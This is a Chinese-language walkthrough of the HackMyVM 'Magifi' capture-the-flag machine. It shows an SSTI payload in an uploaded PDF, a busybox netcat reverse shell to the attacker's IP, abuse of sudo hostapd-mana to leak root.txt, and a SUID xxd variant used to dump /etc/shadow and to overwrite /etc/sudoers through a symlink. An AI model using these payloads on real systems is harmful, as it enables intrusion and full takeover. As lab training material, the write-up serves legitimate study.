HackMyVM-Magifi-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.181  08:00:27:f7:62:1f       (Unknown)
192.168.60.254  00:50:56:e4:ae:23       (Unknown)

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
❯ export ip=192.168.60.181
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.181:22
Open 192.168.60.181:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 17:39 CST
Initiating ARP Ping Scan at 17:39
Scanning 192.168.60.181 [1 port]
Completed ARP Ping Scan at 17:39, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:39
Completed Parallel DNS resolution of 1 host. at 17:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:39
Scanning 192.168.60.181 [2 ports]
Discovered open port 22/tcp on 192.168.60.181
Discovered open port 80/tcp on 192.168.60.181
Completed SYN Stealth Scan at 17:39, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.181
Host is up, received arp-response (0.00075s latency).
Scanned at 2025-02-12 17:39:11 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:F7:62:1F (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

访问80端口，需要域名，编辑一下hosts

来自htb的❓

❯ sudo vim /etc/hosts
192.168.60.181  hogwarts.htb

浏览器访问一下，开始就有一个文件上传

当我尝试上传了他提供的模板docx文件，会显示内部服务器错误

可能只允许pdf文件上传

我将docx导出为pdf，再次上传则能解析成功

显示pdf中的内容

SSTI注入

我尝试修改pdf内容，疑似存在ssti注入，会解析

那我试一下执行命令

{{ cycler.__init__.__globals__.os.popen('id').read() }}

得知用户名harry_potter

直接反弹一个shell

{{ cycler.__init__.__globals__.os.popen('busybox nc 192.168.60.100 4444 -e sh').read() }}

监听一下端口

❯ pwncat-cs -lp 4444
[18:02:15] Welcome to pwncat 🐈!                           __main__.py:164
[18:08:42] received connection from 192.168.60.181:55726        bind.py:84
[18:08:43] 0.0.0.0:4444: upgrading from /usr/bin/busybox to manager.py:957
           /usr/bin/bash
           192.168.60.181:55726: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$

发现用户拥有sudo权限

好像都是关于无线的

用户提权

先拿个user

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo -l
Matching Defaults entries for harry_potter on MagiFi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry_potter may run the following commands on MagiFi:
    (root) NOPASSWD: /usr/sbin/aireplay-ng, /usr/sbin/airmon-ng,
        /usr/sbin/airodump-ng, /usr/bin/airdecap-ng, /usr/bin/hostapd-mana
(remote) harry_potter@MagiFi:/home/harry_potter$ cat user.txt
hogwarts{ea4bc74f09fb69771165e57b1b215de9}

Aircrack-ng套件用于渗透wifi，现查一下用法

这里有个bug，算是个作弊的方案吧

利用hostapd-mana可以显示详细的debug信息，可以顺带将root.txt读出来

你不加-dd也可以读取

remote) harry_potter@MagiFi:/home/harry_potter$ sudo hostapd-mana --help
hostapd-mana: invalid option -- '-'
hostapd-mana v2.6
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2016, Jouni Malinen <[email protected]> and contributors
--------------------------------------------------
MANA https://github.com/sensepost/hostapd-mana
By @singe ([email protected])
Original MANA EAP by Ian ([email protected])
Original karma patches by Robin Wood - [email protected]
Original EAP patches by Brad Antoniewicz @brad_anton
Sycophant by Michael Kruger @_cablethief
usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] \
         [-g <global ctrl_iface>] [-G <group>]\
         [-i <comma-separated list of interface names>]\
         <configuration file(s)>

options:
   -h   show this usage
   -d   show more debug messages (-dd for even more)
   -B   run daemon in the background
   -e   entropy file
   -g   global control interface path
   -G   group for control interfaces
   -P   PID file
   -K   include key data in debug messages
   -i   list of interface names to use
   -S   start all the interfaces synchronously
   -t   include timestamps in some debug messages
   -v   show hostapd version

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo hostapd-mana -dd /root/root.txt
random: Trying to read entropy from /dev/random
Configuration file: /root/root.txt
Line 1: invalid line 'hogwarts{5ed0818c0181fe97f744d7b1b51dd9c7}'
1 errors found in configuration file '/root/root.txt'
Failed to set up interface with /root/root.txt
hostapd_init: free iface 0x55be46caa340
Failed to initialize interface

---

Root提权

再次信息收集后发现在tom.riddle家目录下有个隐藏的suid权限图片

(remote) harry_potter@MagiFi:/home/tom.riddle$ ls -la
total 44
drwxr-xr-x 3 tom.riddle tom.riddle  4096 Feb  4 09:57 .
drwxr-xr-x 7 root       root        4096 Sep 27 11:46 ..
lrwxrwxrwx 1 root       root           9 Sep 27 10:21 .bash_history -> /dev/null
-rw-r--r-- 1 tom.riddle tom.riddle   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tom.riddle tom.riddle  3771 Feb 25  2020 .bashrc
drwx------ 2 tom.riddle tom.riddle  4096 Feb  4 09:57 .cache
-rwsr-x--x 1 root       tom.riddle 17136 Feb 12 10:19 .horcrux.png
-rw-r--r-- 1 tom.riddle tom.riddle   807 Feb 25  2020 .profile

当查找suid权限的时候可以发现还有一个魔改的xxd

/usr/bin/xxd_horcrux

(remote) harry_potter@MagiFi:/home/harry_potter$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/xxd_horcrux
/usr/bin/su
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/authbind/helper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/snapd/23545/usr/lib/snapd/snap-confine
/snap/snapd/21759/usr/lib/snapd/snap-confine
/snap/core20/2434/usr/bin/chfn
/snap/core20/2434/usr/bin/chsh
/snap/core20/2434/usr/bin/gpasswd
/snap/core20/2434/usr/bin/mount
/snap/core20/2434/usr/bin/newgrp
/snap/core20/2434/usr/bin/passwd
/snap/core20/2434/usr/bin/su
/snap/core20/2434/usr/bin/sudo
/snap/core20/2434/usr/bin/umount
/snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2434/usr/lib/openssh/ssh-keysign
/snap/core20/2379/usr/bin/chfn
/snap/core20/2379/usr/bin/chsh
/snap/core20/2379/usr/bin/gpasswd
/snap/core20/2379/usr/bin/mount
/snap/core20/2379/usr/bin/newgrp
/snap/core20/2379/usr/bin/passwd
/snap/core20/2379/usr/bin/su
/snap/core20/2379/usr/bin/sudo
/snap/core20/2379/usr/bin/umount
/snap/core20/2379/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2379/usr/lib/openssh/ssh-keysign
/home/tom.riddle/.horcrux.png

我尝试利用这个来读取.horcrux.png，会发现给了个提示

(remote) harry_potter@MagiFi:/home/tom.riddle$ /usr/bin/xxd_horcrux -r .horcrux.png -O 1
Not every wizards can use or destroy a Horcrux!
并非所有的巫师都能使用或摧毁魂器！

看了下这个魔改的xxd我们可以读，尝试下载下来

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ ls -al /usr/bin/xxd_horcrux
-rwsr-xr-x 1 root root 17264 Sep 25 12:22 /usr/bin/xxd_horcrux
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$
(local) pwncat$ download /usr/bin/xxd_horcrux
/usr/bin/xxd_horcrux ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.3/17.3 KB • ? • 0:00:00
[13:38:48] downloaded 17.26KiB in 0.16 seconds  

利用IDA Pro反编译一下

那直接自己touch一个.horcrux.png不就完了吗

给个777权限，所有人都可以读

读一个shadow也可以

(remote) harry_potter@MagiFi:/home/harry_potter$ touch .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ chmod 777 .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ /usr/bin/xxd_horcrux /etc/shadow -O .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ cat .horcrux.png |xxd -r
root:$6$KflwZsO6c4DW8laq$AVs2hfT9i1calD.V6aKIr5Wej26J1tjgSz5R674SSJDuWvX1RWqHYw79Q.OIqeIlhl0ksI7UJ7d0YHJp4F.J81:19993:0:99999:7:::
daemon:*:19430:0:99999:7:::
bin:*:19430:0:99999:7:::
sys:*:19430:0:99999:7:::
sync:*:19430:0:99999:7:::
games:*:19430:0:99999:7:::
man:*:19430:0:99999:7:::
lp:*:19430:0:99999:7:::
mail:*:19430:0:99999:7:::
news:*:19430:0:99999:7:::
uucp:*:19430:0:99999:7:::
proxy:*:19430:0:99999:7:::
www-data:*:19430:0:99999:7:::
backup:*:19430:0:99999:7:::
list:*:19430:0:99999:7:::
irc:*:19430:0:99999:7:::
gnats:*:19430:0:99999:7:::
nobody:*:19430:0:99999:7:::
systemd-network:*:19430:0:99999:7:::
systemd-resolve:*:19430:0:99999:7:::
systemd-timesync:*:19430:0:99999:7:::
messagebus:*:19430:0:99999:7:::
syslog:*:19430:0:99999:7:::
_apt:*:19430:0:99999:7:::
tss:*:19430:0:99999:7:::
uuidd:*:19430:0:99999:7:::
tcpdump:*:19430:0:99999:7:::
landscape:*:19430:0:99999:7:::
pollinate:*:19430:0:99999:7:::
fwupd-refresh:*:19430:0:99999:7:::
usbmux:*:19991:0:99999:7:::
sshd:*:19991:0:99999:7:::
systemd-coredump:!!:19991::::::
lxd:!:19991::::::
freerad:*:19991:0:99999:7:::
rubeus.hagrid:!:19991:0:99999:7:::
albus.dumbledore:!:19991:0:99999:7:::
minerva.mcgonagall:!:19991:0:99999:7:::
tom.riddle:$6$l2y72YLXF2tIL.rC$d3SQEKFlGu9wi/omLDmHJYGP3uRSD9t2hnRTqveIMOHG8pa80Ku81d3kbfXZy0bpC2PRp9xLqE7IQi3EQ4bf1/:19991:0:99999:7:::
harry_potter:$6$Cu5tGqfYYF/NWp6f$bLb5lfce4bMH10OYBG27nYBoMTMciI9NOxIR2XGliWIhzHE2iU0kS1ZKuSNPnYRS/y12jnt4jmr8pMfDsRicK1:19993:0:99999:7:::

但是我觉得正常思路是要切换到tom.riddle用户，利用魔改的xxd来读tom.riddle家目录下的.horcrux.png

估计是出题没考虑到，代码也不够严格，只判断文件名

那root的flag也可以读取

如果要再进一步拿到root shell，可以写个sudoers进去

(remote) harry_potter@MagiFi:/tmp$ echo "harry_potter  ALL=(ALL) NOPASSWD: ALL">aa
(remote) harry_potter@MagiFi:/tmp$ cat aa |xxd >123
(remote) harry_potter@MagiFi:/tmp$ cat 123
00000000: 6861 7272 795f 706f 7474 6572 2020 414c  harry_potter  AL
00000010: 4c3d 2841 4c4c 2920 4e4f 5041 5353 5744  L=(ALL) NOPASSWD
00000020: 3a20 414c 4c0a                           : ALL.

得到123这个文件，你利用魔改的xxd在-r反向操作写到.horcrux.png

但是你可以将/etc/sudoers链接到这个.horcrux.png

就可以成功写入了

(remote) harry_potter@MagiFi:/home/harry_potter$ rm .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ ln -s /etc/sudoers .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ ls -al
total 32
drwxr-xr-x 4 harry_potter harry_potter 4096 Feb 13 06:12 .
drwxr-xr-x 7 root         root         4096 Sep 27 11:46 ..
lrwxrwxrwx 1 root         root            9 Sep 27 11:45 .bash_history -> /dev/null
-rw-r--r-- 1 harry_potter harry_potter  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 harry_potter harry_potter 3771 Feb 25  2020 .bashrc
drwxr-xr-x 5 harry_potter harry_potter 4096 Sep 26 13:06 Hogwarts_web
lrwxrwxrwx 1 harry_potter harry_potter   12 Feb 13 06:12 .horcrux.png -> /etc/sudoers
-rw-r--r-- 1 harry_potter harry_potter  807 Feb 25  2020 .profile
drwx------ 3 harry_potter harry_potter 4096 Feb 12 10:24 snap
-rw-r--r-- 1 harry_potter harry_potter   43 Feb  4 10:04 user.txt
Hogwarts_web  snap  user.txt
(remote) harry_potter@MagiFi:/home/harry_potter$ /usr/bin/xxd_horcrux -r /tmp/123 -O .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo -l
User harry_potter may run the following commands on MagiFi:
    (ALL) NOPASSWD: ALL
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo su
root@MagiFi:/home/harry_potter# id
uid=0(root) gid=0(root) groups=0(root)
root@MagiFi:/home/harry_potter# cd ~
root@MagiFi:~# cat root.txt
hogwarts{5ed0818c0181fe97f744d7b1b51dd9c7}

到这里就完全没有用到Aircrack-ng套件，感觉也不是正常思路来解